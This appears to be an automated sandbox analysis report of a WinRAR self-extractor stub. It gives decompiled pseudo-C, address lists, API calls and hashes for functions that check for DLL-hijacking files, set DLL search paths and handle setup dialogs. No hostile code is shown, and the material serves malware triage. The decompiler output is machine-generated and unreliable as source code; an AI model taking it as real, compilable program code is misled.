                                            0x00c4a6ad
                                            0x00c4a6b4
                                            0x00c4a6b9
                                            0x00c4a6bb
                                            0x00c4a6ca
                                            0x00c4a6d2
                                            0x00c4a6d5
                                            0x00c4a724
                                            0x00c4a724
                                            0x00c4a72b
                                            0x00c4a72d
                                            0x00c4a72d
                                            0x00c4a6dd
                                            0x00c4a6e4
                                            0x00000000
                                            0x00000000
                                            0x00c4a6f3
                                            0x00c4a6f9
                                            0x00c4a6fb
                                            0x00000000
                                            0x00c4a701
                                            0x00c4a706
                                            0x00c4a70c
                                            0x00c4a70e
                                            0x00c4a714
                                            0x00c4a71e
                                            0x00c4a71e
                                            0x00000000
                                            0x00c4a70e
                                            0x00c4a6fb
                                            0x00000000
                                            0x00c4a724
                                            0x00c4a6a7
                                            0x00c4a62a
                                            0x00c4a62a
                                            0x00c4a62d
                                            0x00c4a668
                                            0x00c4a669
                                            0x00c4a670
                                            0x00c4a676
                                            0x00000000
                                            0x00000000
                                            0x00c4a678
                                            0x00c4a67f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4a67f
                                            0x00c4a62f
                                            0x00c4a632
                                            0x00c4a64b
                                            0x00c4a650
                                            0x00c4a652
                                            0x00c4a65e
                                            0x00c4a65e
                                            0x00000000
                                            0x00c4a652
                                            0x00000000
                                            0x00c4a632
                                            0x00c4a609
                                            0x00c4a60b
                                            0x00000000

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C4A5D6
                                              • Part of subcall function 00C312D7: GetDlgItem.USER32(00000000,00003021), ref: 00C3131B
                                              • Part of subcall function 00C312D7: SetWindowTextW.USER32(00000000,00C622E4), ref: 00C31331
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prologItemTextWindow
                                            • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                            • API String ID: 810644672-3870082069
                                            • Opcode ID: 09938506e966e57c8620f8ed3f7e2c9521a7672a98f4573bd367b96a7cd84e51
                                            • Instruction ID: 2a63fd3dc739ced9a3169619c6be7b567b1522a41b5c533831ac6b8d3a57c439
                                            • Opcode Fuzzy Hash: 09938506e966e57c8620f8ed3f7e2c9521a7672a98f4573bd367b96a7cd84e51
                                            • Instruction Fuzzy Hash: D7420471A84348BFEB21ABA0DC8AFEE3B7CBB05700F044155F616A61D1D7B44E85DB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3FD49, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314libraryfileloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 76%
                                            			E00C3FD49(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t118;
				void* _t126;
				int _t130;
				long _t141;
				int _t167;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t177;
				signed char _t184;
				struct _SECURITY_ATTRIBUTES* _t195;
				long _t197;
				void* _t198;
				struct HINSTANCE__* _t201;
				signed int _t203;
				signed int _t205;
				void* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E00C4D940();
				_push(_t207);
				_a3 = 0;
				_t201 = GetModuleHandleW(L"kernel32");
				if(_t201 == 0) {
					L5:
					_t118 =  *0xc6d080; // 0xc62884
					_t208 = _t207 | 0xffffffff;
					_t202 = 0x800;
					_a8 = L"version.dll";
					_a12 = L"DXGIDebug.dll";
					_a16 = L"sfc_os.dll";
					_a20 = L"SSPICLI.DLL";
					_a24 = L"rsaenh.dll";
					_a28 = L"UXTheme.dll";
					_a32 = L"dwmapi.dll";
					_a36 = L"cryptbase.dll";
					_a40 = L"lpk.dll";
					_a44 = L"usp10.dll";
					_a48 = L"clbcatq.dll";
					_a52 = L"comres.dll";
					_a56 = L"ws2_32.dll";
					_a60 = L"ws2help.dll";
					_a64 = L"psapi.dll";
					_a68 = L"ieframe.dll";
					_a72 = L"ntshrui.dll";
					_a76 = L"atl.dll";
					_a80 = L"setupapi.dll";
					_a84 = L"apphelp.dll";
					_a88 = L"userenv.dll";
					_a92 = L"netapi32.dll";
					_a96 = L"shdocvw.dll";
					_a100 = L"crypt32.dll";
					_a104 = L"msasn1.dll";
					_a108 = L"cryptui.dll";
					_a112 = L"wintrust.dll";
					_a116 = L"shell32.dll";
					_a120 = L"secur32.dll";
					_a124 = L"cabinet.dll";
					_a128 = L"oleaccrc.dll";
					_a132 = L"ntmarta.dll";
					_a136 = L"profapi.dll";
					_a140 = L"WindowsCodecs.dll";
					_a144 = L"srvcli.dll";
					_a148 = L"cscapi.dll";
					_a152 = L"slc.dll";
					_a156 = L"imageres.dll";
					_a160 = L"dnsapi.DLL";
					_a164 = L"iphlpapi.DLL";
					_a168 = L"WINNSI.DLL";
					_a172 = L"netutils.dll";
					_a176 = L"mpr.dll";
					_a180 = L"devrtl.dll";
					_a184 = L"propsys.dll";
					_a188 = L"mlang.dll";
					_a192 = L"samcli.dll";
					_a196 = L"samlib.dll";
					_a200 = L"wkscli.dll";
					_a204 = L"dfscli.dll";
					_a208 = L"browcli.dll";
					_a212 = L"rasadhlp.dll";
					_a216 = L"dhcpcsvc6.dll";
					_a220 = L"dhcpcsvc.dll";
					_a224 = L"XmlLite.dll";
					_a228 = L"linkinfo.dll";
					_a232 = L"cryptsp.dll";
					_a236 = L"RpcRtRemote.dll";
					_a240 = L"aclui.dll";
					_a244 = L"dsrole.dll";
					_a248 = L"peerdist.dll";
					if( *_t118 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a772, _t202);
						E00C3FAB1( &_a9160, E00C3B943(_t223,  &_a772), _t202);
						_t195 = 0;
						_t203 = 0;
						do {
							if(E00C3A995() < 0x600) {
								_t126 = 0;
								__eflags = 0;
							} else {
								_t126 = E00C3FCFD( *((intOrPtr*)(_t210 + 0x18 + _t203 * 4))); // executed
							}
							if(_t126 == 0) {
								L20:
								_push(0x800);
								E00C3B9B9(_t227,  &_a772,  *((intOrPtr*)(_t210 + 0x1c + _t203 * 4)));
								_t130 = GetFileAttributesW( &_a760); // executed
								if(_t130 != _t208) {
									_t195 =  *((intOrPtr*)(_t210 + 0x18 + _t203 * 4));
									L24:
									if(_v1 != 0) {
										L30:
										_t234 = _t195;
										if(_t195 == 0) {
											return _t130;
										}
										E00C3B98D(_t234,  &_a768);
										if(E00C3A995() < 0x600) {
											_push( &_a9160);
											_push( &_a768);
											E00C33E41( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t195);
											_t210 = _t210 + 0x18;
											_t130 = AllocConsole();
											__eflags = _t130;
											if(_t130 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t141 = E00C52B33( &_a4860);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
												Sleep(0x2710);
												_t130 = FreeConsole();
											}
										} else {
											E00C3FCFD(L"dwmapi.dll");
											E00C3FCFD(L"uxtheme.dll");
											_push( &_a9152);
											_push( &_a760);
											E00C33E41( &_a4852, 0x864, E00C3DA42(_t185, 0xf1), _t195);
											_t210 = _t210 + 0x18;
											_t130 = E00C49735(0,  &_a4848, E00C3DA42(_t185, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t205 = 0;
									while(1) {
										_push(0x800);
										E00C3B9B9(0,  &_a768,  *((intOrPtr*)(_t210 + 0x3c + _t205 * 4)));
										_t130 = GetFileAttributesW( &_a756);
										if(_t130 != _t208) {
											break;
										}
										_t205 = _t205 + 1;
										if(_t205 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t195 =  *((intOrPtr*)(_t210 + 0x38 + _t205 * 4));
									goto L30;
								}
							} else {
								_t130 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x24 + _t203 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t130 - 2;
								if(_t130 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t203 = _t203 + 1;
						} while (_t203 < 8);
						goto L24;
					}
					_t197 = E00C56662(_t185, _t118);
					_pop(_t185);
					if(_t197 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4868, 0x800);
					_t206 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
					if(_t206 == _t208 || SetFilePointer(_t206, _t197, 0, 0) != _t197) {
						L13:
						CloseHandle(_t206);
						_t202 = 0x800;
						goto L14;
					} else {
						_t167 = ReadFile(_t206,  &_a13260, 0x7ffe,  &_a4, 0);
						_t222 = _t167;
						if(_t167 == 0) {
							goto L13;
						}
						_t185 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t198 = E00C3F835(_t222);
							_t223 = _t198;
							if(_t198 == 0) {
								goto L13;
							}
							E00C3FCFD( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t198);
						}
						goto L13;
					}
				}
				_t176 = GetProcAddress(_t201, "SetDllDirectoryW");
				_t184 = _a46032;
				if(_t176 != 0) {
					asm("sbb ecx, ecx");
					_t185 =  ~(_t184 & 0x000000ff) & 0x00c622e4;
					 *_t176( ~(_t184 & 0x000000ff) & 0x00c622e4);
				}
				_t177 = GetProcAddress(_t201, "SetDefaultDllDirectories");
				if(_t177 != 0) {
					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					_v1 = 1;
				}
				goto L5;
			}























                                            0x00c3fd4e
                                            0x00c3fd54
                                            0x00c3fd5c
                                            0x00c3fd67
                                            0x00c3fd6b
                                            0x00c3fdbe
                                            0x00c3fdbe
                                            0x00c3fdc3
                                            0x00c3fdcc
                                            0x00c3fdd1
                                            0x00c3fdd9
                                            0x00c3fde4
                                            0x00c3fdec
                                            0x00c3fdf4
                                            0x00c3fdfc
                                            0x00c3fe04
                                            0x00c3fe0c
                                            0x00c3fe14
                                            0x00c3fe1c
                                            0x00c3fe24
                                            0x00c3fe2c
                                            0x00c3fe34
                                            0x00c3fe3c
                                            0x00c3fe44
                                            0x00c3fe4c
                                            0x00c3fe54
                                            0x00c3fe5c
                                            0x00c3fe64
                                            0x00c3fe6c
                                            0x00c3fe74
                                            0x00c3fe7c
                                            0x00c3fe84
                                            0x00c3fe8c
                                            0x00c3fe94
                                            0x00c3fe9c
                                            0x00c3fea4
                                            0x00c3feaf
                                            0x00c3feba
                                            0x00c3fec5
                                            0x00c3fed0
                                            0x00c3fedb
                                            0x00c3fee6
                                            0x00c3fef1
                                            0x00c3fefc
                                            0x00c3ff07
                                            0x00c3ff12
                                            0x00c3ff1d
                                            0x00c3ff28
                                            0x00c3ff33
                                            0x00c3ff3e
                                            0x00c3ff49
                                            0x00c3ff54
                                            0x00c3ff5f
                                            0x00c3ff6a
                                            0x00c3ff75
                                            0x00c3ff80
                                            0x00c3ff8b
                                            0x00c3ff96
                                            0x00c3ffa1
                                            0x00c3ffac
                                            0x00c3ffb7
                                            0x00c3ffc2
                                            0x00c3ffcd
                                            0x00c3ffd8
                                            0x00c3ffe3
                                            0x00c3ffee
                                            0x00c3fff9
                                            0x00c40004
                                            0x00c4000f
                                            0x00c4001a
                                            0x00c40025
                                            0x00c400f3
                                            0x00c400fe
                                            0x00c40117
                                            0x00c40122
                                            0x00c40124
                                            0x00c40126
                                            0x00c40130
                                            0x00c4013d
                                            0x00c4013d
                                            0x00c40132
                                            0x00c40136
                                            0x00c40136
                                            0x00c40141
                                            0x00c40163
                                            0x00c40163
                                            0x00c40174
                                            0x00c40181
                                            0x00c40185
                                            0x00c4018f
                                            0x00c40193
                                            0x00c40198
                                            0x00c401cc
                                            0x00c401cc
                                            0x00c401ce
                                            0x00c402e5
                                            0x00c402e5
                                            0x00c401dc
                                            0x00c401eb
                                            0x00c4025a
                                            0x00c40262
                                            0x00c40276
                                            0x00c4027b
                                            0x00c4027e
                                            0x00c40284
                                            0x00c40286
                                            0x00c4028f
                                            0x00c402a4
                                            0x00c402bc
                                            0x00c402c7
                                            0x00c402cd
                                            0x00c402cd
                                            0x00c401ed
                                            0x00c401f2
                                            0x00c401fc
                                            0x00c40208
                                            0x00c40210
                                            0x00c4022a
                                            0x00c4022f
                                            0x00c40249
                                            0x00c40249
                                            0x00c402d5
                                            0x00c402d5
                                            0x00c4019a
                                            0x00c4019c
                                            0x00c4019c
                                            0x00c401ad
                                            0x00c401ba
                                            0x00c401be
                                            0x00000000
                                            0x00000000
                                            0x00c401c0
                                            0x00c401c4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c401c6
                                            0x00c401c8
                                            0x00000000
                                            0x00c401c8
                                            0x00c40143
                                            0x00c40158
                                            0x00c4015e
                                            0x00c40161
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c40161
                                            0x00c40187
                                            0x00c40187
                                            0x00c40188
                                            0x00000000
                                            0x00c4018d
                                            0x00c40031
                                            0x00c40033
                                            0x00c40036
                                            0x00000000
                                            0x00000000
                                            0x00c40047
                                            0x00c40065
                                            0x00c40069
                                            0x00c400e7
                                            0x00c400e8
                                            0x00c400ee
                                            0x00000000
                                            0x00c4007b
                                            0x00c40090
                                            0x00c40096
                                            0x00c40098
                                            0x00000000
                                            0x00000000
                                            0x00c400a0
                                            0x00c400a2
                                            0x00c400a7
                                            0x00c400b6
                                            0x00c400be
                                            0x00c400dc
                                            0x00c400e1
                                            0x00c400e3
                                            0x00c400e5
                                            0x00000000
                                            0x00000000
                                            0x00c400c9
                                            0x00c400ce
                                            0x00c400da
                                            0x00c400db
                                            0x00c400db
                                            0x00000000
                                            0x00c400dc
                                            0x00c40069
                                            0x00c3fd79
                                            0x00c3fd7b
                                            0x00c3fd84
                                            0x00c3fd8b
                                            0x00c3fd8d
                                            0x00c3fd94
                                            0x00c3fd94
                                            0x00c3fd9c
                                            0x00c3fda0
                                            0x00c3fdb0
                                            0x00c3fdb7
                                            0x00c3fdb9
                                            0x00c3fdb9
                                            0x00000000

                                            APIs
                                            • GetModuleHandleW.KERNEL32 ref: 00C3FD61
                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C3FD79
                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C3FD9C
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C40047
                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C4005F
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C40071
                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00C628D4,00000000), ref: 00C40090
                                            • CloseHandle.KERNEL32(00000000), ref: 00C400E8
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C400FE
                                            • CompareStringW.KERNELBASE(00000400,00001001,00C62920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00C40158
                                            • GetFileAttributesW.KERNELBASE(?,?,00C628EC,00000800,?,00000000,?,00000800), ref: 00C40181
                                            • GetFileAttributesW.KERNEL32(?,?,00C629AC,00000800), ref: 00C401BA
                                              • Part of subcall function 00C3FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C3FD18
                                              • Part of subcall function 00C3FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C3E7F6,Crypt32.dll,?,00C3E878,?,00C3E85C,?,?,?,?), ref: 00C3FD3A
                                            • _swprintf.LIBCMT ref: 00C4022A
                                            • _swprintf.LIBCMT ref: 00C40276
                                              • Part of subcall function 00C33E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C33E54
                                            • AllocConsole.KERNEL32 ref: 00C4027E
                                            • GetCurrentProcessId.KERNEL32 ref: 00C40288
                                            • AttachConsole.KERNEL32(00000000), ref: 00C4028F
                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00C402B5
                                            • WriteConsoleW.KERNEL32(00000000), ref: 00C402BC
                                            • Sleep.KERNEL32(00002710), ref: 00C402C7
                                            • FreeConsole.KERNEL32 ref: 00C402CD
                                            • ExitProcess.KERNEL32 ref: 00C402D5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                            • API String ID: 1201351596-3298887752
                                            • Opcode ID: 12f3ad30dfbe1a30a43d63e86dbe8cfa8be444d715b98b5016cf9bd6bf36d4d7
                                            • Instruction ID: a950ab3e5682ea72aa91899010f080f544609ac20c2cc6928cf893559eaab558
                                            • Opcode Fuzzy Hash: 12f3ad30dfbe1a30a43d63e86dbe8cfa8be444d715b98b5016cf9bd6bf36d4d7
                                            • Instruction Fuzzy Hash: CDD180F1548B84ABDB35DF50C889B9FBBE8FF85344F50091DE68996180CBB08649DB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4B4C7, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438windowfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 49%
                                            			E00C4B4C7(void* __edx) {
				intOrPtr _t215;
				void* _t220;
				intOrPtr _t278;
				void* _t291;
				WCHAR* _t293;
				void* _t296;
				WCHAR* _t297;
				void* _t302;

				_t291 = __edx;
				E00C4D870(E00C6150B, _t302);
				_t215 = 0x1bc80;
				E00C4D940();
				if( *((intOrPtr*)(_t302 + 0xc)) == 0) {
					L169:
					 *[fs:0x0] =  *((intOrPtr*)(_t302 - 0xc));
					return _t215;
				}
				_push(0x1000);
				_push(_t302 - 0xe);
				_push(_t302 - 0xd);
				_push(_t302 - 0x5c84);
				_push(_t302 - 0xfc8c);
				_push( *((intOrPtr*)(_t302 + 0xc)));
				_t215 = E00C4A156();
				 *((intOrPtr*)(_t302 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t278 =  *((intOrPtr*)(_t302 + 0x10));
					do {
						_t220 = _t302 - 0x5c84;
						_t296 = _t302 - 0x1bc8c;
						_t293 = 6;
						goto L4;
						L6:
						while(E00C41410(_t302 - 0xfc8c,  *((intOrPtr*)(0xc6d618 + _t297 * 4))) != 0) {
							_t297 =  &(_t297[0]);
							if(_t297 < 0xe) {
								continue;
							} else {
								goto L167;
							}
						}
						if(_t297 > 0xd) {
							goto L167;
						}
						switch( *((intOrPtr*)(_t297 * 4 +  &M00C4C0D7))) {
							case 0:
								__eflags = _t278 - 2;
								if(_t278 != 2) {
									goto L167;
								}
								_t299 = 0x800;
								E00C495F8(_t302 - 0x7c84, 0x800);
								E00C3A188(E00C3B625(_t302 - 0x7c84, _t302 - 0x5c84, _t302 - 0xdc8c, 0x800), _t278, _t302 - 0x8c8c, 0x800);
								 *(_t302 - 4) = _t293;
								E00C3A2C2(_t302 - 0x8c8c, _t302 - 0xdc8c);
								E00C36EF9(_t302 - 0x3c84);
								_push(_t293);
								_t286 = _t302 - 0x8c8c;
								_t238 = E00C3A215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
								__eflags = _t238;
								if(_t238 == 0) {
									L28:
									 *(_t302 - 4) =  *(_t302 - 4) | 0xffffffff;
									E00C3A19E(_t302 - 0x8c8c);
									goto L167;
								} else {
									goto L15;
									L16:
									E00C3B1B7(_t286, __eflags, _t302 - 0x7c84, _t302 - 0x103c, _t299);
									E00C3AEA5(__eflags, _t302 - 0x103c, _t299);
									_t301 = E00C52B33(_t302 - 0x7c84);
									__eflags = _t301 - 4;
									if(_t301 < 4) {
										L18:
										_t266 = E00C3B5E5(_t302 - 0x5c84);
										__eflags = _t266;
										if(_t266 != 0) {
											goto L28;
										}
										L19:
										_t268 = E00C52B33(_t302 - 0x3c84);
										__eflags = 0;
										 *((short*)(_t302 + _t268 * 2 - 0x3c82)) = 0;
										E00C4E920(_t293, _t302 - 0x3c, _t293, 0x1e);
										_t304 = _t304 + 0x10;
										 *((intOrPtr*)(_t302 - 0x38)) = 3;
										_push(0x14);
										_pop(_t271);
										 *((short*)(_t302 - 0x2c)) = _t271;
										 *((intOrPtr*)(_t302 - 0x34)) = _t302 - 0x3c84;
										_push(_t302 - 0x3c);
										 *0xc6def4();
										goto L20;
									}
									_t276 = E00C52B33(_t302 - 0x103c);
									__eflags = _t301 - _t276;
									if(_t301 > _t276) {
										goto L19;
									}
									goto L18;
									L20:
									_t243 = GetFileAttributesW(_t302 - 0x3c84);
									__eflags = _t243 - 0xffffffff;
									if(_t243 == 0xffffffff) {
										L27:
										_push(_t293);
										_t286 = _t302 - 0x8c8c;
										_t245 = E00C3A215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
										__eflags = _t245;
										if(_t245 != 0) {
											_t299 = 0x800;
											L15:
											SetFileAttributesW(_t302 - 0x3c84, _t293);
											__eflags =  *((char*)(_t302 - 0x2c78));
											if(__eflags == 0) {
												goto L20;
											}
											goto L16;
										}
										goto L28;
									}
									_t247 = DeleteFileW(_t302 - 0x3c84);
									__eflags = _t247;
									if(_t247 != 0) {
										goto L27;
									} else {
										_t300 = _t293;
										_push(_t293);
										goto L24;
										L24:
										E00C33E41(_t302 - 0x103c, 0x800, L"%s.%d.tmp", _t302 - 0x3c84);
										_t304 = _t304 + 0x14;
										_t252 = GetFileAttributesW(_t302 - 0x103c);
										__eflags = _t252 - 0xffffffff;
										if(_t252 != 0xffffffff) {
											_t300 = _t300 + 1;
											__eflags = _t300;
											_push(_t300);
											goto L24;
										} else {
											_t255 = MoveFileW(_t302 - 0x3c84, _t302 - 0x103c);
											__eflags = _t255;
											if(_t255 != 0) {
												MoveFileExW(_t302 - 0x103c, _t293, 4);
											}
											goto L27;
										}
									}
								}
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E00C52B33(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xc8ce0c);
									__eax = E00C52B5E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0xc8ce0c = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E00C566ED(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00C52B4E(__esi);
									}
								}
								goto L167;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
								}
								goto L167;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L167;
								}
								__eflags =  *0xc79602 - __di;
								if( *0xc79602 != __di) {
									goto L167;
								}
								__eax = 0;
								__edi = __ebp - 0x5c84;
								_push(0x22);
								 *(__ebp - 0x103c) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x5c84) - __ax;
								if( *(__ebp - 0x5c84) == __ax) {
									__edi = __ebp - 0x5c82;
								}
								__eax = E00C52B33(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L167;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L54:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L66:
											__ebp - 0x103c = E00C3FAB1(__ebp - 0x103c, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L67:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x103c;
											__eax = E00C50D9B(__ebp - 0x103c, __ebp - 0x103c);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
												if( *((intOrPtr*)(__eax + 2)) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x103c;
											__edi = 0xc79602;
											E00C3FAB1(0xc79602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
											__eax = E00C49FFC(__ebp - 0x103c, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
											__ebx =  *0xc6df7c;
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xc79602); // executed
											__eax = __ebp - 0x103c;
											__eax = E00C52B69(__ebp - 0x103c, 0xc79602, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x103c = 0;
												__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
											}
											goto L167;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L57:
											__eax = __ebp - 0x18;
											__ebx = 0;
											_push(__ebp - 0x18);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xc6dea8();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x103c;
												_push(__ebp - 0x103c);
												__eax = __ebp - 0x1c;
												_push(__ebp - 0x1c);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x18));
												__eax =  *0xc6dea4();
												_push( *(__ebp - 0x18));
												 *0xc6de84() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x103c) = __cx;
											}
											__eflags =  *(__ebp - 0x103c) - __bx;
											if( *(__ebp - 0x103c) != __bx) {
												__eax = __ebp - 0x103c;
												__eax = E00C52B33(__ebp - 0x103c);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x103c = E00C3FA89(__eflags, __ebp - 0x103c, "\\", __esi);
												}
											}
											__esi = E00C52B33(__edi);
											__eax = __ebp - 0x103c;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x103c = E00C3FA89(__eflags, __ebp - 0x103c, __edi, 0x800);
											}
											goto L67;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L66;
										}
										goto L57;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L54;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L167;
